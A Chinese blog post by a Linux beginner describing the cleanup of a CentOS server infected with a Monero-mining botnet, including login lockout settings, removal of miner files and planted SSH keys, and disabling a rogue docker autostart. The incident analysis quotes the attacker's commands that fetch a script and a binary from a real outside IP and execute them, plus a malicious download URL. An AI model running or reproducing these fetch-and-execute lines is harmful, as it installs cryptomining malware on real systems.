centos小白快速吃鸡-谈后续防护

Posted 2021-04-06 粒粒金

经过一晚的监控，发现效果很好，没有报警，没有可疑进程运行，一切都很清爽：

思想上一定要有安全意识，要不然，事到临头只能是手忙脚乱。现在需要收尾的工作也有很多。

1、增加非法登录策略

输错n次锁定账户

查看系统密码策略：more /etc/pam.d/sshd

结果是没有做任何限制，这是非常危险的。果断增加密码限制策略：输错5次锁定账户，普通用户锁定300秒，root用户锁定10秒，并亲测有效

auth required pam_tally2.so deny=5 unlock_time=300 even_deny_root root_unlock_time=10

2、残留分析

在crontabs里面有一个定时任务：curl -fsSL http://165.225.157.157:8000/i.sh | sh

在ie浏览器里面看看这个路径的文件到底是什么：

原来这个可恶的脚本干了这几件事：

1）、在定时任务里面插入2个任务

2）、创建了个文件夹

文件夹里面都有什么呢？我们看看：

但是这里面多了一个文件back.db，猜想应该是后面的程序创建的。

3）、下载运行的程序到tmp文件夹

curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011

3、tmp文件夹到底有什么呢

里面一堆不认识的，但是很明显，有下载的病毒文件。其中有一个：wnTKYg，这是什么东东，求助度娘，原来是门罗币的挖矿程序。还有一个ddg.3001，这就是挖矿程序的守护进程。这样解决思路就很简单了，去掉执行权限：chmod -x wnTKYg，再删掉文件。最终直接把tmp文件夹都删掉。再去查挖矿文件是否存在：find / -name wnTKYg*，find / -name ddg.*，结果系统里已经找不到了。

4.ssh免密登录

是否对方已经能够悄悄的登录到我的系统，而我无感知呢，cd /root/.ssh，结果发现有可疑文件：

bash里面是什么呢？

看来还是有风险，果断的干掉bash和authorized_keys文件。

5.挖矿守护进程是如何启动的

这个问题这两天一直在困扰我，总得有一个启动进程的地方吧，可是找了半天，没有发现任何端倪。于是我又回到那个自动执行任务的脚本：

仔细的看了一下，赫然发现这行代码：

chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

原来是这样，秘密就在这里     && /tmp/ddgs.3011，这行代码的意思就是赋予

ddgs.3011 文件具有执行权限，并且立刻执行。

至此，终于感觉要告一段落了。肉鸡处理方案也有了，安全维护也有一定的脉络了。

6.未完的故事

查看用户执行命令的history，突然发现几个命令。很是陌生，关于docker的，而且我们系统也从来没有用到过docker：

这里面有一个网址：http://www.yiluzhuanqian.com/soft/docker_images/ylzq_v2_0.tar

这就是这个网站的介绍，有没有感到很恐怖，简直是无孔不入。而且我在reboot的时候记得docker进程也启动了，看来是把这个docker进程加到自启动里面了。于是执行一下：docker ps

还好，里面没有装载程序。但是也不能让这个定时炸弹留着啊。于是首先把docker自启动关闭，查看自启动进程配置：chkconfig --list

将docker从自启动中去掉chkconfig --del docker

检查一下发现docker自启动不存在了

杀死docker进程

7.端口自己扫描，nmap好用

可以自己下载一个windows版的nmap，扫描一下自己的服务器，看看有没有可疑端口还在开放，用不到的就赶紧关掉。

8.后续

安全之路，漫漫长，没有尽头。但是一定要有安全意识，防微杜渐，尽早的把危机消灭在萌芽状态。还要有刨根问底的劲头，争取把在自己认知范围内的疑惑都解决掉，才能有更快的提升。

以上这些就是我一个centos小白的一点点感悟！